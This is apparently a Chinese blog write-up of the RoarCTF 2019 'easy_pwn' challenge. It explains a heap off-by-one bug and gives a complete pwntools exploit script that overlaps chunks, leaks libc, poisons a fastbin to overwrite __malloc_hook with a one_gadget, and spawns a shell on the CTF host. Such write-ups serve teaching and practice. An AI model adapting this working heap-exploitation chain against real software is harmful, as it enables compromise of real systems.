RoarCTF-2019
RoarCTF 2019
easy_pwn
思路:write note 存在 off-by-one 漏洞(编辑时可以多写一个字节到下一个 chunk 的 size 域)。先填满 chunk A,用溢出的那个字节改写相邻 chunk B 的 size,把 B 扩大以便后续能写得更远;再重新分配 B,借助扩大后的范围溢出改写已 free 的 chunk C 的 fd,使其指向 small chunk D;随后 free 掉 small chunk D 让它进入 unsorted bin,再 show 与 D 重叠的那个 note,即可泄漏 unsorted_bin 地址(main_arena 内),从而得到 libc_base。接着用同样的手法溢出改写 fast_bin chunk 的 fd,把 chunk 分配到 __malloc_hook 附近并写入 one_gadget;最后改写某个 chunk 的 size 再 free 它,free 会因为 size 非法走到 malloc_printerr——在 glibc 2.23 这类旧版本中,该报错路径会经由 backtrace/dlopen 间接调用 malloc,从而命中 __malloc_hook 拿到 shell。注意脚本里的 0x3c4b78、fake chunk 偏移和 one_gadget 偏移都与目标 libc 版本绑定,换环境必须重新计算。
#!/usr/bin/env python
#coding=utf8
from pwn import *
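# --- target selection -------------------------------------------------------
# The original script started a local process and then immediately rebound
# ``p`` to the remote service, leaving an orphaned ./easy_pwn child behind.
# Pick exactly one endpoint instead: ``python exp.py LOCAL`` runs against the
# local binary (pwntools exposes command-line flags through ``args``); the
# default stays the remote CTF service, as before.
if args.LOCAL:
    p = process('./easy_pwn')
else:
    p = remote('39.97.182.233', 40205)

ctx = context
ctx.terminal = ['tmux', 'splitw', '-h']   # only matters for gdb.attach
#----- debug info -----#
# ctx.log_level = 'debug'
#----- debug info -----#

#----- quick script -----#
# Thin aliases over the tube ``p``.  They are kept as short names on purpose:
# the exploit body calls them dozens of times and reads better this way.
sd = lambda c: p.send(c)
sdl = lambda c: p.sendline(c)
sda = lambda a, c: p.sendafter(a, c)
sdla = lambda a, c: p.sendlineafter(a, c)
rl = lambda: p.recvline()
ru = lambda c: p.recvuntil(c, True)                    # True == drop the delimiter
rle = lambda c: p.recvline_endswith(c, keepends=False)
rls = lambda c: p.recvline_startswith(c, False)
rn = lambda c: p.recvn(c)
uu64 = lambda c: u64(c.ljust(8, chr(0)))             # unpack a <=8-byte leak, zero-padded (py2 str)
itr = lambda: p.interactive()
#----- quick script -----#
#----- global variables -----#
#----- global variables -----#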
def cmd(c):
    """Answer the menu prompt with choice *c* (1 add, 2 edit, 3 free, 4 show)."""
    choice = str(c)
    sdla('choice: ', choice)
def add(sz):
    """Menu 1: create a new note, requesting *sz* bytes from the binary."""
    size_text = str(sz)
    cmd(1)
    sdla('size: ', size_text)
def edit(idx, sz, c):
    """Menu 2: rewrite note *idx*.

    *sz* is the length the binary is told; *c* is the raw payload sent after
    the 'content: ' prompt with no trailing newline, so it may hold any byte
    values (fd pointers, size fields, ...).
    """
    cmd(2)
    for prompt, value in (('index: ', idx), ('size: ', sz)):
        sdla(prompt, str(value))
    sda('content: ', c)
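def edit_over10(idx, sz, c):
    """Edit note *idx* through the off-by-one path.

    Identical to :func:`edit` except that the declared size is *sz* + 10.
    Judging by how the exploit uses it (``'a'*0x18 + '\\x41'`` against a
    0x18-byte note), the binary's edit handler accepts a size up to 10 over
    the allocation and then lets one extra byte through, which lands on the
    next chunk's size field -- NOTE(review): inferred from this script and
    the writeup, confirm against the disassembly.  Delegating to ``edit``
    keeps the two helpers from drifting apart.
    """
    edit(idx, sz + 10, c)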
def free(idx):
    """Menu 3: release note *idx* (the binary's free path, hence the name)."""
    index_text = str(idx)
    cmd(3)
    sdla('index: ', index_text)
def show(idx):
    """Menu 4: print note *idx*; the reply is left in the tube for the caller."""
    index_text = str(idx)
    cmd(4)
    sdla('index: ', index_text)
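def attack():
    """Run the whole exploit chain over the tube ``p``.

    Mirrors the writeup above: lay out the heap, turn the one-byte overflow
    into overlapping chunks, leak an unsorted-bin pointer to recover the libc
    base, redirect a fastbin into a fake chunk next to __malloc_hook, write a
    one_gadget there, then provoke malloc_printerr so the hook is reached.
    Every call depends on the exact order and sizes -- do not reorder.

    Note indices in the comments are the slots the binary hands out in
    allocation order, as tracked by the original author.
    """
    # libc-relative offsets.  These are version-specific (they look like the
    # usual Ubuntu 16.04 glibc 2.23 values -- TODO confirm against the target
    # libc; on any other build all three must be recomputed).
    unsorted_bin_off = 0x3c4b78            # leaked fd -> inside main_arena
    fake_chunk_off = 3951365 - 0x10 - 0x8  # 0x3c4aed; presumably the misaligned 0x7f fake chunk just below __malloc_hook
    one_gadget_off = 0xf02a4

    # --- stage 1: heap layout ---------------------------------------------
    add(0x18)   # 0
    add(0x18)   # 1
    add(0x18)   # 2
    add(0x18)   # 3
    add(0x18)   # 4
    add(0x18)   # 5
    add(0x80)   # 6  (0x90 chunk; freed later to seed the unsorted bin)
    add(0x18)   # 7
    add(0x28)   # 8
    add(0x28)   # 9
    add(0x60)   # 10
    add(0x60)   # 11
    add(0x28)   # 12
    add(0x28)   # 13
    add(0x28)   # 14

    # --- stage 2: overlap chunks and leak libc ------------------------------
    # Off-by-one from note 0 sets note 1's size byte to 0x41; re-allocating
    # index 1 then yields a 0x40 chunk that reaches over note 2's header.
    edit_over10(0, 0x18, 'a' * 0x18 + '\x41')
    free(1)
    add(0x38)   # 1, now overlapping note 2
    edit(1, 0x20, '\x00' * 0x18 + p64(0x21))    # put note 2's size back
    # Same trick from note 4 onto note 5: size 0xb1 spans notes 5 and 6.
    edit_over10(4, 0x18, 'a' * 0x18 + '\xb1')
    free(5)
    add(0xa1)   # 5, now overlapping note 6's header
    edit(5, 0x20, '\x00' * 0x18 + p64(0x21))    # make note 6 look like a 0x20 chunk
    free(3)
    free(2)     # fastbin 0x20 is now 2 -> 3
    # Overwrite the low byte of note 2's fd (first qword of its user data)
    # with 0xc0 so the fastbin points at note 6 (heap assumed page-aligned,
    # note 6 sits at heap+0xc0 -- verify in gdb if the layout differs).
    edit(1, 0x21, 'a' * 0x18 + p64(0x21) + '\xc0')
    add(0x18)   # 2
    add(0x18)   # 3, carved out of note 6
    edit(5, 0x20, '\x00' * 0x18 + p64(0x91))    # restore note 6's real size
    free(6)     # 0x90 chunk -> unsorted bin; its fd now points into main_arena
    show(3)     # note 3 aliases note 6's user data, so this prints that fd
    # Skip the 9-byte 'content: ' prompt, then take the 6 pointer bytes.
    unsorted_bin = uu64(rn(6 + 9)[9:])
    print(hex(unsorted_bin))
    base = unsorted_bin - unsorted_bin_off
    print(hex(base))
    fake_chunk = base + fake_chunk_off
    one = base + one_gadget_off
    print(hex(one))

    # --- stage 3: fastbin attack towards __malloc_hook ----------------------
    add(0x80)   # presumably reclaims the unsorted 0x90 chunk so it stops interfering
    # Off-by-one from note 8 grows note 9 to 0xa0 so it covers note 10's header.
    edit_over10(8, 0x28, 'a' * 0x28 + '\xa1')
    free(9)
    add(0x98)   # 9, now overlapping note 10
    edit(9, 0x30, '\x00' * 0x28 + p64(0x71))    # keep note 10 a valid 0x70 fastbin chunk
    free(11)
    free(10)    # fastbin 0x70 is now 10 -> 11
    # Point note 10's fd at the fake chunk; the next two allocations return
    # note 10 and then the fake chunk.
    edit(9, 0x38, '\x00' * 0x28 + p64(0x71) + p64(fake_chunk))
    add(0x60)   # 10
    add(0x60)   # 11, served from the fake chunk
    # 0x13 bytes of padding place the qword on __malloc_hook itself (per the
    # writeup; exact distance depends on fake_chunk_off above).
    edit(11, 0x13 + 8, 0x13 * '\x00' + p64(one))
    show(0)     # kept from the original script; not obviously needed by the chain

    # --- stage 4: trigger ---------------------------------------------------
    # Corrupt note 13's size byte and free it.  free rejects the bogus size
    # and calls malloc_printerr; on old glibc that error path ends up
    # allocating, which runs __malloc_hook -> one_gadget.
    edit_over10(12, 0x28, 'a' * 0x28 + '\x88')
    free(13)
    itr()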
# Only fire the exploit when run as a script, never on import.
if __name__ == "__main__":
    attack()
文章标题:RoarCTF-2019
本文作者:枫云李
发布时间:2019-10-12, 00:00:00
最后更新:2020-04-11, 01:25:10
原始链接:https://primelyw.github.io/2019/10/12/RoarCTF-2019/
版权声明:"署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。